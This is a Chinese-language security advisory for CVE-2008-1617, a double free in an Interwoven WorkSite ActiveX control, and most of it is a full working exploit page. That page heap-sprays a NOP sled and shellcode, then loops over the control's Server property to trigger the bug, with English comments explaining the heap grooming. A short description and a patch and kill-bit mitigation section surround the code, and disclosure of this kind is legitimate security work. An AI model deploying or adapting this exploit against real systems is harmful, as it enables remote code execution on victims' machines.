Interwoven WorkSite Web TransferCtrl Class控件双重释放漏洞

发布日期:2008-04-04
更新日期:2008-04-11

受影响系统:
Interwoven WorkSite 8.2
不受影响系统:
Interwoven WorkSite 8.2 SP1 P2
描述:
BUGTRAQ  ID: 28628
CVE(CAN) ID: CVE-2008-1617

Worksite是Interwoven发布的文档和邮件管理解决方案。

Worksite的iManFile.cab文件所安装的Web TransferCtrl Class ActiveX控件(CLSID:4BECECDE-E494-4f69-A3DE-DA0B77726307)在处理Server属性时存在双重释放漏洞。如果用户受骗访问了恶意站点的话,就可以触发这个漏洞,导致执行任意指令。

<*来源:J Fitzpatrick
  
  链接:http://secunia.com/advisories/29733/
        http://www.mwrinfosecurity.com/publications/mwri_interwoven-worksite-activex-control-remote-code-execution_2008-03-10.pdf
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<script>
// Filler for the first spray pass: a 4-unit marker made of 0x0013d4b4
// (presumably an address expected to fall inside the sprayed region — TODO
// confirm) padded with 0x1111. spray() grows it by doubling, so it must stay
// a mutable `var`, and `var` is kept because a later <script> in this page
// redeclares globals with `var` (a `const`/`let` here would make that throw).
var data = unescape("%ud4b4%u0013%u1111%u1111");
// A single NOP pair (0x90 0x90); spray() doubles this into the sled.
var nop = unescape("%u9090");
// Payload written as %uXXXX pairs (each pair is one little-endian 16-bit unit),
// with the target path embedded as plain text and NUL-terminated.
// The bytes bb 91 b0 e7 77 / ff d3 decode to `mov ebx, 0x77e7b091; call ebx`:
// a hard-coded absolute address, so this shellcode only runs correctly on the
// one Windows build it was written against (presumably it calls a file-creation
// API with the embedded path to drop c:\owned.txt as proof of execution).
var shellcode = unescape(
    "%uc033%u5050%u6a90%u9001%u9050%u5050%u9090" +
    "%u00e8%u0000%u5800%uc083" +
    "%u500d%u91bb%ue7b0%uff77" +
    "%u90d3" + "c:\\owned.txt" +
    "%u0000"
);

// Holds every sprayed string so the collector cannot reclaim them.
var ar = new Array();
// Heap spray. Fills the browser heap with two kinds of large strings so that
// the stale pointer freed twice by the control lands on attacker-controlled
// data. This is 2008-era IE code: CollectGarbage() is an IE/JScript host
// function (undefined in other engines), and `data`, `nop` and `shellcode`
// are the globals declared earlier in this script. Allocation sizes and the
// order of these statements are part of the exploit — do not reorder them.
function spray() {
  // Double `data` until it is >= 100000 UTF-16 units (4 -> 131072), then keep
  // 512 copies alive; the trailing "x" presumably forces a distinct
  // allocation per copy instead of 512 references to the same string.
  while(data.length<100000) data+=data;
  for(var x=0; x<512; x++) ar.push(data+"x")
  CollectGarbage();
  // Same for the NOP sled (1 -> 131072 units), then 150 copies of
  // sled + shellcode, so both kinds of strings end up almost the same size.
  while(nop.length<99900) nop+=nop;
  for(var x=0; x<150; x++) ar.push(nop+shellcode)
  CollectGarbage();
}
spray();
</script>
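<!-- Loads aDRja18y.html, which is not part of this listing; its role is not
     documented (it may hold a second copy of the spray, or be a trigger page). -->
<!-- Fixed: the listing closed this element with </script>. In a standards-mode
     parser <iframe> is a raw-text element, so without </iframe> the rest of the
     page (including the trigger <script>) would be swallowed as iframe content.
     If the original intent was <script src="aDRja18y.html"></script>, adjust
     accordingly. -->
<iframe src="aDRja18y.html"></iframe>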


<!-- The vulnerable control is instantiated by CLSID directly from the page, so
     the only user interaction needed is loading this HTML in IE on a machine
     with the control installed. onload schedules start() after 2.5 s
     (presumably to let the spray above finish). The string form of setTimeout
     is eval-style code and is kept only because the PoC relies on it. -->
<body onload="window.setTimeout('start()',2500)">
<!-- Container whose innerHTML start() rewrites to recreate the control each
     round and later empties to destroy the instance. -->
<div id="hold">
<object id='target' classid="CLSID:4BECECDE-E494-4f69-A3DE-DA0B77726307"></object>
</div>
<script>
// One U+0810 unit: the repeat unit of the value written to the Server property.
var s = unescape("%u0810");
// NOTE(review): this redeclares the global `ar` that the spray script above
// fills. If both scripts run in the same document this replaces it with an
// empty array and leaves the sprayed strings to the next CollectGarbage() —
// confirm the intended page layout (the listing may be two separate files).
var ar = [];
// Exactly 25 copies of `s`; start() appends one more per use (26 units).
var str = "";
for (var i = 0; i < 25; i++) str += s;

// Trigger loop for the double free in the control's Server property handler
// (the advisory names that property; which internal buffer is freed twice is
// not visible from here). Everything below is heap grooming for the IE/JScript
// allocator of the era: the statement order, the read-back of Server, the
// explicit CollectGarbage() calls and the seemingly redundant assignments are
// deliberate — do not "clean up" this function. It is first scheduled from
// <body onload> and re-schedules itself every second until the corrupted
// chunk is reused and execution lands in the spray (or the browser crashes).
function start() {
    // Recreate the control so each round starts with a fresh instance.
    document.getElementById("hold").innerHTML = "<object id='target' classid='CLSID:4BECECDE-E494-4f69-A3DE-DA0B77726307'></object>";
    var obj=document.getElementById("target");
    // 26-unit strings (25 x U+0810 + one more) used as Server values;
    // presumably sized to match the chunk that gets freed twice — TODO confirm.
    var str1=str+s;
    var str2=str+s;
    var str3=str+s;
    CollectGarbage();

    // Five rounds of set, read back, drop the reference: presumably each
    // set/get makes the control allocate and release its internal copy.
    for(var x=0; x<5; x++) {
        str1=str+s;
        obj.Server=str1;
        str1=obj.Server;
        str1=0;
    }

    // Two more set/get/drop rounds with the pre-allocated strings.
    obj.Server=str2;
    str2=obj.Server;
    str2=0;
    
    obj.Server=str3;
    str3=obj.Server;
    str3=0;
    
    CollectGarbage();
    
    // Churn: 51-unit strings kept in `ar` and 26-unit strings that are
    // discarded immediately, to occupy freed chunks of those sizes.
    var str4=str+s+str;
    var c=10;
    while(c-- > 0) ar.push(str+s+str);

    // Three throw-away 26-unit allocations (only the last one stays referenced).
    var str5 = str+s;var str5 = str+s;var str5 = str+s;
    
    // Destroy the control instance and drop the last JS reference, then
    // collect — presumably this is where the stale buffer is freed again.
    document.getElementById("hold").innerHTML = "";
    obj = 0;
    CollectGarbage();
    // More churn of the same sizes after the second free.
    var str4=str+s+str;
    var str5 = str+s;var str5 = str+s;var str5 = str+s;
    // Retry every second; the page keeps looping until the exploit lands.
    window.setTimeout("start()",1000)
}
</script>
</body>

建议:
厂商补丁:

Interwoven
----------
目前厂商已经发布了升级补丁以修复这个安全问题(修复版本为 WorkSite 8.2 SP1 P2),请到厂商的主页下载。在无法立即升级的情况下,可以为该控件的 CLSID(4BECECDE-E494-4f69-A3DE-DA0B77726307)设置 kill bit,阻止 IE 加载该 ActiveX 控件,作为临时缓解措施:

http://worksitesupport.interwoven.com
